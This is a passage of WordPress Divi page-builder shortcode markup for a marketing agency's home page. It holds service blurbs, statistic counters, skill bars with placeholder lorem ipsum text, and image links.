button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"4.4.9\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" 